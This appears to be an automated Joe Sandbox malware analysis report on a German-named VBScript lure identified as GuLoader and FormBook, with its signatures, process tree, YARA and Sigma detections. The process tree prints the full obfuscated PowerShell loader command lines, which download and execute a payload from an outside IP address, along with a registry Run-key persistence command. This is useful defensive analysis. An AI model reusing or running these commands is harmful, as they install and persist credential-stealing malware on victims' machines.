Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Zahlungsbeleg 202405029058.vbs

Overview

General Information

Sample name:Zahlungsbeleg 202405029058.vbs
Analysis ID:1436288
MD5:913fa02445aa8092996ad3f000aa1ea1
SHA1:c29022193884baeb4aad8a94884995ea80bdeb25
SHA256:f9a51686ace6a200b6c9de7b9a8cd18c6ab67e6841ba64bf1518932ccd78bf78
Tags:DEUgeovbs
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6712 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zahlungsbeleg 202405029058.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • PING.EXE (PID: 6656 cmdline: ping google.com -n 1 MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 6976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PING.EXE (PID: 7184 cmdline: ping %.%.%.% MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 7192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7240 cmdline: C:\Windows\system32\cmd.exe /c dir MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7316 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommandodeles=$Frontotemporal.Length-$Reglorified;For($Nummerordens=5;$Nummerordens -lt $Kommandodeles;$Nummerordens+=6){$Crpe+=$Frontotemporal.$Toupe.Invoke( $Nummerordens, $Reglorified);}$Crpe;}function biblioteksfilerne($kedelcentralen){& ($Dataanlgs) ($kedelcentralen);}$Udskilles=Tyknende 'SnuggMfo.oro Loo zKa.aniStoo,lFlan lSmaaga len,/ U fi5H.gge.Mawse0 Xant Lint(Reae WPaikiiTorden StnidSk ftoM.gtswGrasssGivin Hovs.NAs.erTOutbr Kvot,1Goupi0Poess. ook0Recr,;Tilkn B.arWUnderiTorrinKalku6Rekor4Vandm; Oldt GodkexSlamb6Anvis4Overw;Rente TaalrRrgssvsvige:Ae,li1Synan2 Rupi1 ukat.,onra0Lo.ds)Apoth LouirGTempee OvercGenfokIso.co Syst/Menis2Ioevr0Stan.1Varsl0 sses0subst1 Coex0Un af1Raias IldneFDo,ediOvnhur,etere Luk,fAreahonobblx ara/ Ekvi1kha.e2Folk,1B.lls. Besk0Forme ';$Primevally=Tyknende '.rsteUHy,ossSquibe,parerRewar-TenanAFictigAffaee parn Jerrt Myrt ';$Dien=Tyknende 'SynsmhMilittVajedtDarenpS.eep:Dob,o/Perpl/Erase8Siren7Nonwe. jack1 ,ive2 Over1 Ar,g.Beret1Retst0Maler5Reded..ippe5Spare4Count/SculpOChapoxMec da D,pllBl eduSlippr imuli Cplma Indi2ret t0Libet9Thick.No,ensPostnmJo,dbi.onsu ';$Longrun=Tyknende 'Folke>Patte ';$Dataanlgs=Tyknende ' Verdi Unree NonvxTppe ';$Traditions='Nashira';biblioteksfilerne (Tyknende 'GregsSUnasseGrmmetPersi-HvalfCPieb.o Inv n CinntHerdsePrve nIndtetBrede Argum-RefitPPla taMbelptAfgrfhklar knivbTC,rva:morte\KonomGSlutkrS.igey S,agnBlahltPne,me stern SilkdTalene FejnsMes n.Fritit SubmxbismutCosmo Under-RhyptV Ext.a ,atol f,inuPublieKolla Nook $SkrivTRubler.orynaChancdZonaliGe.trtC.nidi NoncoKitnin Uds,sOrig ;Recep ');biblioteksfilerne (Tyknende ' Repai edelfBasqu Diff(HoppetStucce Sce,s ivsvtEpe.i-.odstpBarriaTyroltSysgth ang CalcaTPatro:Rigad\IsoclGUnordr Aggryamputn,hrootBordhe agttn myecdGui ee RevesFlere.Ps,udtPlastxPantet prun) Snot{D sene VindxleafsiKultutSonor} Sies;Limen ');$Kursusoversigten = Tyknende 'Servoe ontcN gashBi.looUnchi Preco%VagnuaKodiapPseu,pSe,igdAlt.baPeru.tInteraSpa.l%Stuve\DismeVcirc.aKerattFarvee SprarSleyspS.angaSha rsgutsesUnmeweYlvahnSundheAfspnsKsehu2Wiens4 Para.BesteAPatruc .llecmyone Resou&Parad&t.lip DiscueDurescBogtihLgel,okilot Re.ia$B sni ';biblioteksfilerne (Tyknende 'Blidh$KitnigToxollstrbsogeckobS,ffeaAristlTrans:tun,nTMephii.ammetDe uta.apitrSto.m= I.er(Modtac PresmIndevdAfhng Henst/tenebcOpt.i Im,r$Hord,K TrykuFje nr Skgls BeliusukkesNyoproKomm,vTelesePharmr AritsL mpnianligg rimot TweeeEmpirnDi.yo)Majus ');biblioteksfilerne (Tyknende 'citat$Comp.gEnd,sl TrygoAjlefbWeddea Br,dl Haa.:Hold FSlidsaRefuseL.ngtrAarvad Punki St rg,ross=Sk.iv$HandgDAlhusiGaulle DiaznFradr. OversStephp SheblservaigymnatAmtsv(Ouvri$AlpevLHospioD apen IdocgSe.ulrSustiu Griln Spar)ele h ');$Dien=$Faerdig[0];biblioteksfilerne (Tyknende ' Girl$ Un egA drolDredgoMortabOver,a B.bal L.vn:Sta iFThyreroplbeeSherieRefinlValgbaRetinnbevi,cvar.ee SaagrN ninsC.ook= SurfNLkkereTribuwSk am-Tire OUnprobEidesjBitumeStyrmckor otSurm. HjagtSBle.iy SupesUnsu.tTilkeeMak rmPlta.. LmmeNTela,e UnvetPrvel. VegeWmeniseKiwieb ReupC AntilUnsa.iSpe ieVint nTeglvta alo ');biblioteksfilerne (Tyknende '.nfan$ DeusFFam,lr TiggeThodueIndsalLeakia Helln.ortvc udvaeH nstrVolumsMe.le.,ekonHO.stdeRedera VinedDiftoeBasrerSeculsGaast[Gidse$BaadsPRadiorAp.thi.ublem Out.e DybsvnoncoaCarpolLimitl.istayPassu]Start=Obser$TermiUEdsafdHoboesbetitkRigdoi AnaplPatrul remseju.aesUenig ');$Naturtr=Tyknende ' ArabFI dder Unhee ExtreAfsvkls.epnaHo monAlbincIntegeForvar bekms Gr,p.Adju D no coInsu.wEtabln B.valAn icoOrenjaStj.rdBegreFGrundiP,efalU,vuleKrigs( Hydr$ba,reDFoldaiTorpeeGauffnRefle,Robin$GematoMalesvExtrae omarstramdVagtmrMatt,ythion)Hagta ';$Naturtr=$Titar[1]+$Naturtr;$overdry=$Titar[0];biblioteksfilerne (Tyknende 'Respi$Unling ,haklSanitoImmunbKoereaCortel Wise:.hmsmESta.ls TanztAd.omhF imreSommesGiganiDkfaboBitism,chelemi,rot Fr,srHomelyPos e1Unruf7Ne,to6 Anti=Alter(UncliTF,agmeBordesTzaritMarse-CoccoPPolyea Catat BesthAfliv Arbej$FestioMyriavIsraeeWal,arPaatrdCountr roreyPaasy)Sivap ');while (!$Esthesiometry176) {biblioteksfilerne (Tyknende 'S vsk$,nequgSkindlDummeoSyst bMote.aStereladmir:Maro L MaraeStrghvProp ePhot.mHoneya DryanB,rkndNeg.rsOve v= s.id$C asstUn eurPreinu SkraeI,gtt ') ;biblioteksfilerne $Naturtr;biblioteksfilerne (Tyknende 'FradrS,rakvtDentnaAbdicrRec mt,dult-BashfSSaltblSaddeeRukaneTen.epHerop Srgem4Bakov ');biblioteksfilerne (Tyknende 'pulve$Extrag TolllRubasoEsotebUenigaafgrel.alad: HvsnEPustesB,mbltSidsthEspoueServisunnaki FdevoGuldsmExpuneTravet EmnerSov kyPo.tl1De.el7 Co r6Ha ay= O.pl(I,venT Svi,eForplsFds etVinte-Ke,tsPper,daPerittRhodehSjatt Firaa$ForsyoUnhusvRe,ece Ant,rH.mogdDese r Wo,syInter)A,fri ') ;biblioteksfilerne (Tyknende 'Reg,s$Kemikg Duv.lHeno,oUnideb Ho.kaMa telNonev: popSAp oceBrassp DiaktbarkeiBeskrs.rnseyClinil SkatlHyperaCharmb ChrolDy.ehesi if=Strej$ cla,gDemesl D buoBedlabNarkoaBardulViles:Arb.jC Lagra F.agtU.hunt.enselRingleChan.gSvrdla,aveetC,cobeTelen1Aden +Penan+Nause%Ridde$Vak.eFOkariaSt ute OverrFestsdRetspiMiljagSpads. Therc Fi eoPerjuuStikknFrem.tEnsn ') ;$Dien=$Faerdig[$Septisyllable];}biblioteksfilerne (Tyknende 'Multi$UnsuigMicrolStumpoL icibRevleaBogydlCont :PotomFned.roBedu,s PowesBat hePre,crKybel gasbl= Trai estheGAnimee eizit kemi- NonjCB,ldioRet hnGaasetara,ieRrelsnTjlestExcub Sator$KonduoLitt.vBepapeH,emmrIntemdSeniarAfkray Male ');biblioteksfilerne (Tyknende 'Nonde$ByretgBrugslEvacuoTjenebDadelaOpk elUdsen: A chP For.otranssT rteiDkstitLovgiiUds ro ,rilnSlidssFri,tao,erdnG,dfrgJaskei AcnevInconebyltelMattbsR,vene esmo .aret=,orsk Acaro[VestaS Un.ryHe.tasSa met.renieEvalum,ontr. .echCHarbro Mun nAsc.ivTopngeBolsjr Ko mtEpico]React:Mange: DecaFGamogr Ud.eomik om ermiBd.sseaTornesSpendeSe.su6 Jock4nonniSSny etTreetrMerc iProren nfeagPlica(Surpl$tidehFCodoro ellsHvirvsFlutee De,irUndow)Count ');biblioteksfilerne (Tyknende 'Synsp$Siccig Ca dlTa,sto.rolebNogleaRenholStagn:B rfoDNordbeScrimlKro.seTropog KisteSilverBoghve Afbrt Sel mRembudB.dgeeunglor Puka ,rvle=Moder Marqu[to,roSPartiy KaolsSnibbtNonioe ,nibmUnbef.Af lrTGgegeeHushaxBord,tNonv,. ubsaESforzn Illuc posio SkuldCo upiYppetnSabbigNorde]Norda:,unkt:CustoA yveSEfterCFortsIS entIAnusi.Ska,tGPeccaeVeiletTovtrSTin ltBrummr DialiN,nrenslvfegSten,(Vrdia$ V deP T,rooAcyansOateriTramwt PoleiSixpeoBevirn FestsA.eolaUndebnNonprg plebiCog.ov,rovie S.mil.oglesMentaeHello)Ratif ');biblioteksfilerne (Tyknende 'Junni$ForhagGieselJoyproMedlbb Ultia Umynl emin:AaremBFernaiVernansljferty,edePneums sinu=Knogl$ForpaDSphegeTra ilvers.eVrikdgNord,e Frosr OdoneZombitS,rtemStipud trope Rejnr ,eli.AriadsTypoguV.ntubCephasResidt yprer ProfiNonnenHoe.lgKonfe(Ceilo2Bgesp8Advi 4 Anra0Contr2 Uove1Admin, S dd2 Opsl8Drfta4 B,ho7 Medi1Biolu)Novit ');biblioteksfilerne $Binres;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7464 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vaterpassenes24.Acc && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7560 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommandodeles=$Frontotemporal.Length-$Reglorified;For($Nummerordens=5;$Nummerordens -lt $Kommandodeles;$Nummerordens+=6){$Crpe+=$Frontotemporal.$Toupe.Invoke( $Nummerordens, $Reglorified);}$Crpe;}function biblioteksfilerne($kedelcentralen){& ($Dataanlgs) ($kedelcentralen);}$Udskilles=Tyknende 'SnuggMfo.oro Loo zKa.aniStoo,lFlan lSmaaga len,/ U fi5H.gge.Mawse0 Xant Lint(Reae WPaikiiTorden StnidSk ftoM.gtswGrasssGivin Hovs.NAs.erTOutbr Kvot,1Goupi0Poess. ook0Recr,;Tilkn B.arWUnderiTorrinKalku6Rekor4Vandm; Oldt GodkexSlamb6Anvis4Overw;Rente TaalrRrgssvsvige:Ae,li1Synan2 Rupi1 ukat.,onra0Lo.ds)Apoth LouirGTempee OvercGenfokIso.co Syst/Menis2Ioevr0Stan.1Varsl0 sses0subst1 Coex0Un af1Raias IldneFDo,ediOvnhur,etere Luk,fAreahonobblx ara/ Ekvi1kha.e2Folk,1B.lls. Besk0Forme ';$Primevally=Tyknende '.rsteUHy,ossSquibe,parerRewar-TenanAFictigAffaee parn Jerrt Myrt ';$Dien=Tyknende 'SynsmhMilittVajedtDarenpS.eep:Dob,o/Perpl/Erase8Siren7Nonwe. jack1 ,ive2 Over1 Ar,g.Beret1Retst0Maler5Reded..ippe5Spare4Count/SculpOChapoxMec da D,pllBl eduSlippr imuli Cplma Indi2ret t0Libet9Thick.No,ensPostnmJo,dbi.onsu ';$Longrun=Tyknende 'Folke>Patte ';$Dataanlgs=Tyknende ' Verdi Unree NonvxTppe ';$Traditions='Nashira';biblioteksfilerne (Tyknende 'GregsSUnasseGrmmetPersi-HvalfCPieb.o Inv n CinntHerdsePrve nIndtetBrede Argum-RefitPPla taMbelptAfgrfhklar knivbTC,rva:morte\KonomGSlutkrS.igey S,agnBlahltPne,me stern SilkdTalene FejnsMes n.Fritit SubmxbismutCosmo Under-RhyptV Ext.a ,atol f,inuPublieKolla Nook $SkrivTRubler.orynaChancdZonaliGe.trtC.nidi NoncoKitnin Uds,sOrig ;Recep ');biblioteksfilerne (Tyknende ' Repai edelfBasqu Diff(HoppetStucce Sce,s ivsvtEpe.i-.odstpBarriaTyroltSysgth ang CalcaTPatro:Rigad\IsoclGUnordr Aggryamputn,hrootBordhe agttn myecdGui ee RevesFlere.Ps,udtPlastxPantet prun) Snot{D sene VindxleafsiKultutSonor} Sies;Limen ');$Kursusoversigten = Tyknende 'Servoe ontcN gashBi.looUnchi Preco%VagnuaKodiapPseu,pSe,igdAlt.baPeru.tInteraSpa.l%Stuve\DismeVcirc.aKerattFarvee SprarSleyspS.angaSha rsgutsesUnmeweYlvahnSundheAfspnsKsehu2Wiens4 Para.BesteAPatruc .llecmyone Resou&Parad&t.lip DiscueDurescBogtihLgel,okilot Re.ia$B sni ';biblioteksfilerne (Tyknende 'Blidh$KitnigToxollstrbsogeckobS,ffeaAristlTrans:tun,nTMephii.ammetDe uta.apitrSto.m= I.er(Modtac PresmIndevdAfhng Henst/tenebcOpt.i Im,r$Hord,K TrykuFje nr Skgls BeliusukkesNyoproKomm,vTelesePharmr AritsL mpnianligg rimot TweeeEmpirnDi.yo)Majus ');biblioteksfilerne (Tyknende 'citat$Comp.gEnd,sl TrygoAjlefbWeddea Br,dl Haa.:Hold FSlidsaRefuseL.ngtrAarvad Punki St rg,ross=Sk.iv$HandgDAlhusiGaulle DiaznFradr. OversStephp SheblservaigymnatAmtsv(Ouvri$AlpevLHospioD apen IdocgSe.ulrSustiu Griln Spar)ele h ');$Dien=$Faerdig[0];biblioteksfilerne (Tyknende ' Girl$ Un egA drolDredgoMortabOver,a B.bal L.vn:Sta iFThyreroplbeeSherieRefinlValgbaRetinnbevi,cvar.ee SaagrN ninsC.ook= SurfNLkkereTribuwSk am-Tire OUnprobEidesjBitumeStyrmckor otSurm. HjagtSBle.iy SupesUnsu.tTilkeeMak rmPlta.. LmmeNTela,e UnvetPrvel. VegeWmeniseKiwieb ReupC AntilUnsa.iSpe ieVint nTeglvta alo ');biblioteksfilerne (Tyknende '.nfan$ DeusFFam,lr TiggeThodueIndsalLeakia Helln.ortvc udvaeH nstrVolumsMe.le.,ekonHO.stdeRedera VinedDiftoeBasrerSeculsGaast[Gidse$BaadsPRadiorAp.thi.ublem Out.e DybsvnoncoaCarpolLimitl.istayPassu]Start=Obser$TermiUEdsafdHoboesbetitkRigdoi AnaplPatrul remseju.aesUenig ');$Naturtr=Tyknende ' ArabFI dder Unhee ExtreAfsvkls.epnaHo monAlbincIntegeForvar bekms Gr,p.Adju D no coInsu.wEtabln B.valAn icoOrenjaStj.rdBegreFGrundiP,efalU,vuleKrigs( Hydr$ba,reDFoldaiTorpeeGauffnRefle,Robin$GematoMalesvExtrae omarstramdVagtmrMatt,ythion)Hagta ';$Naturtr=$Titar[1]+$Naturtr;$overdry=$Titar[0];biblioteksfilerne (Tyknende 'Respi$Unling ,haklSanitoImmunbKoereaCortel Wise:.hmsmESta.ls TanztAd.omhF imreSommesGiganiDkfaboBitism,chelemi,rot Fr,srHomelyPos e1Unruf7Ne,to6 Anti=Alter(UncliTF,agmeBordesTzaritMarse-CoccoPPolyea Catat BesthAfliv Arbej$FestioMyriavIsraeeWal,arPaatrdCountr roreyPaasy)Sivap ');while (!$Esthesiometry176) {biblioteksfilerne (Tyknende 'S vsk$,nequgSkindlDummeoSyst bMote.aStereladmir:Maro L MaraeStrghvProp ePhot.mHoneya DryanB,rkndNeg.rsOve v= s.id$C asstUn eurPreinu SkraeI,gtt ') ;biblioteksfilerne $Naturtr;biblioteksfilerne (Tyknende 'FradrS,rakvtDentnaAbdicrRec mt,dult-BashfSSaltblSaddeeRukaneTen.epHerop Srgem4Bakov ');biblioteksfilerne (Tyknende 'pulve$Extrag TolllRubasoEsotebUenigaafgrel.alad: HvsnEPustesB,mbltSidsthEspoueServisunnaki FdevoGuldsmExpuneTravet EmnerSov kyPo.tl1De.el7 Co r6Ha ay= O.pl(I,venT Svi,eForplsFds etVinte-Ke,tsPper,daPerittRhodehSjatt Firaa$ForsyoUnhusvRe,ece Ant,rH.mogdDese r Wo,syInter)A,fri ') ;biblioteksfilerne (Tyknende 'Reg,s$Kemikg Duv.lHeno,oUnideb Ho.kaMa telNonev: popSAp oceBrassp DiaktbarkeiBeskrs.rnseyClinil SkatlHyperaCharmb ChrolDy.ehesi if=Strej$ cla,gDemesl D buoBedlabNarkoaBardulViles:Arb.jC Lagra F.agtU.hunt.enselRingleChan.gSvrdla,aveetC,cobeTelen1Aden +Penan+Nause%Ridde$Vak.eFOkariaSt ute OverrFestsdRetspiMiljagSpads. Therc Fi eoPerjuuStikknFrem.tEnsn ') ;$Dien=$Faerdig[$Septisyllable];}biblioteksfilerne (Tyknende 'Multi$UnsuigMicrolStumpoL icibRevleaBogydlCont :PotomFned.roBedu,s PowesBat hePre,crKybel gasbl= Trai estheGAnimee eizit kemi- NonjCB,ldioRet hnGaasetara,ieRrelsnTjlestExcub Sator$KonduoLitt.vBepapeH,emmrIntemdSeniarAfkray Male ');biblioteksfilerne (Tyknende 'Nonde$ByretgBrugslEvacuoTjenebDadelaOpk elUdsen: A chP For.otranssT rteiDkstitLovgiiUds ro ,rilnSlidssFri,tao,erdnG,dfrgJaskei AcnevInconebyltelMattbsR,vene esmo .aret=,orsk Acaro[VestaS Un.ryHe.tasSa met.renieEvalum,ontr. .echCHarbro Mun nAsc.ivTopngeBolsjr Ko mtEpico]React:Mange: DecaFGamogr Ud.eomik om ermiBd.sseaTornesSpendeSe.su6 Jock4nonniSSny etTreetrMerc iProren nfeagPlica(Surpl$tidehFCodoro ellsHvirvsFlutee De,irUndow)Count ');biblioteksfilerne (Tyknende 'Synsp$Siccig Ca dlTa,sto.rolebNogleaRenholStagn:B rfoDNordbeScrimlKro.seTropog KisteSilverBoghve Afbrt Sel mRembudB.dgeeunglor Puka ,rvle=Moder Marqu[to,roSPartiy KaolsSnibbtNonioe ,nibmUnbef.Af lrTGgegeeHushaxBord,tNonv,. ubsaESforzn Illuc posio SkuldCo upiYppetnSabbigNorde]Norda:,unkt:CustoA yveSEfterCFortsIS entIAnusi.Ska,tGPeccaeVeiletTovtrSTin ltBrummr DialiN,nrenslvfegSten,(Vrdia$ V deP T,rooAcyansOateriTramwt PoleiSixpeoBevirn FestsA.eolaUndebnNonprg plebiCog.ov,rovie S.mil.oglesMentaeHello)Ratif ');biblioteksfilerne (Tyknende 'Junni$ForhagGieselJoyproMedlbb Ultia Umynl emin:AaremBFernaiVernansljferty,edePneums sinu=Knogl$ForpaDSphegeTra ilvers.eVrikdgNord,e Frosr OdoneZombitS,rtemStipud trope Rejnr ,eli.AriadsTypoguV.ntubCephasResidt yprer ProfiNonnenHoe.lgKonfe(Ceilo2Bgesp8Advi 4 Anra0Contr2 Uove1Admin, S dd2 Opsl8Drfta4 B,ho7 Medi1Biolu)Novit ');biblioteksfilerne $Binres;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 7656 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vaterpassenes24.Acc && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 7948 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • cmd.exe (PID: 7992 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 8000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • reg.exe (PID: 8040 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
          • kOAlByYcnQDKnTplLRjSHzGyPq.exe (PID: 2872 cmdline: "C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • clip.exe (PID: 7264 cmdline: "C:\Windows\SysWOW64\clip.exe" MD5: E40CB198EBCD20CD16739F670D4D7B74)
              • kOAlByYcnQDKnTplLRjSHzGyPq.exe (PID: 3496 cmdline: "C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                • WerFault.exe (PID: 1456 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 480 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.2230990264.0000000008710000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000014.00000002.2971248438.0000000000EC0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000014.00000002.2971248438.0000000000EC0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a380:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13b3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000000A.00000002.2197404574.0000000005936000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        0000000F.00000002.2454959206.0000000000C70000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          Click to see the 16 entries

          Other

          SourceRuleDescriptionAuthorStrings
          amsi64_7316.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0xff71:$b2: ::FromBase64String(
          • 0xd329:$s1: -join
          • 0x6ad5:$s4: +=
          • 0x6b97:$s4: +=
          • 0xadbe:$s4: +=
          • 0xcedb:$s4: +=
          • 0xd1c5:$s4: +=
          • 0xd30b:$s4: +=
          • 0xf55c:$s4: +=
          • 0xf5dc:$s4: +=
          • 0xf6a2:$s4: +=
          • 0xf722:$s4: +=
          • 0xf8f8:$s4: +=
          • 0xf97c:$s4: +=
          • 0xda45:$e4: Get-WmiObject
          • 0xdc34:$e4: Get-Process
          • 0xdc8c:$e4: Start-Process
          amsi32_7560.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0xfee2:$b2: ::FromBase64String(
          • 0xd329:$s1: -join
          • 0x6ad5:$s4: +=
          • 0x6b97:$s4: +=
          • 0xadbe:$s4: +=
          • 0xcedb:$s4: +=
          • 0xd1c5:$s4: +=
          • 0xd30b:$s4: +=
          • 0xf55c:$s4: +=
          • 0xf5dc:$s4: +=
          • 0xf6a2:$s4: +=
          • 0xf722:$s4: +=
          • 0xf8f8:$s4: +=
          • 0xf97c:$s4: +=
          • 0xda45:$e4: Get-WmiObject
          • 0xdc34:$e4: Get-Process
          • 0xdc8c:$e4: Start-Process
          • 0x17802:$e4: Get-Process

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: WScript or CScript Dropper
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zahlungsbeleg 202405029058.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zahlungsbeleg 202405029058.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zahlungsbeleg 202405029058.vbs", ProcessId: 6712, ProcessName: wscript.exe
          Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
          Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, 